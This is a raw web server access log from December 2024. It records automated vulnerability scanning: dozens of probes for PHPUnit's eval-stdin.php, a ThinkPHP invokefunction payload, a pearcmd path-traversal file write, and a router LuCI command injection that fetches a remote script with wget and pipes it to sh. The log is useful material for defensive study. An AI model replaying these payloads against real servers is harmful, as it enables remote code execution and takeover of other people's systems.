101.66.172.251 - - [19/Dec/2024:23:36:58 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 395 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:36:59 +0100] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 391 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:00 +0100] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 387 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:00 +0100] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 383 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:01 +0100] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 390 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:02 +0100] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:03 +0100] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 388 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:03 +0100] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 384 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:04 +0100] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 380 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:05 +0100] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 376 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:05 +0100] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 392 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:06 +0100] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 388 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:07 +0100] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 384 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:07 +0100] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 380 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:08 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:09 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 403 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:10 +0100] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:10 +0100] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 398 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:11 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:12 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:12 +0100] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:13 +0100] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 398 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:14 +0100] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:15 +0100] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:15 +0100] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 403 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:16 +0100] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:17 +0100] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:18 +0100] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:18 +0100] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:19 +0100] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:21 +0100] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:21 +0100] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:22 +0100] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 412 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:23 +0100] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:23 +0100] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:24 +0100] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:25 +0100] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:26 +0100] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 423 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:26 +0100] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 361 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:27 +0100] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 200 423 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:28 +0100] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 423 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:37:29 +0100] "GET /containers/json HTTP/1.1" 404 360 "-" "Custom-AsyncHttpClient"
156.59.198.135 - - [19/Dec/2024:23:37:41 +0100] "GET /renault.activities.at/htdocs/activities/framework/color/img/pixel.gif HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.155 - - [19/Dec/2024:23:47:38 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
31.220.1.88 - - [19/Dec/2024:23:48:31 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.215.238.91 - - [19/Dec/2024:23:52:02 +0100] "POST /apply.cgi HTTP/1.1" 404 284 "http://212.69.160.11:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
199.127.63.64 - - [19/Dec/2024:23:53:13 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [19/Dec/2024:23:59:17 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110291503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.51.122 - - [20/Dec/2024:00:03:18 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.41.236 - - [20/Dec/2024:00:07:20 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Dec/2024:00:15:18 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102121403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
34.140.231.8 - - [20/Dec/2024:00:15:32 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
154.213.187.122 - - [20/Dec/2024:00:17:36 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
47.128.63.25 - - [20/Dec/2024:00:19:21 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Dec/2024:00:35:19 +0100] "GET /ed-test.2web.at/stats/lang/awstats-de.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Dec/2024:00:39:19 +0100] "GET /renault.activities.at/htdocs/binaries/10017496.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
199.127.63.64 - - [20/Dec/2024:00:42:15 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.136 - - [20/Dec/2024:00:47:20 +0100] "GET /ed-test.2web.at/stats/lang/awstats-fi.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.31.146 - - [20/Dec/2024:00:51:21 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [20/Dec/2024:00:51:57 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"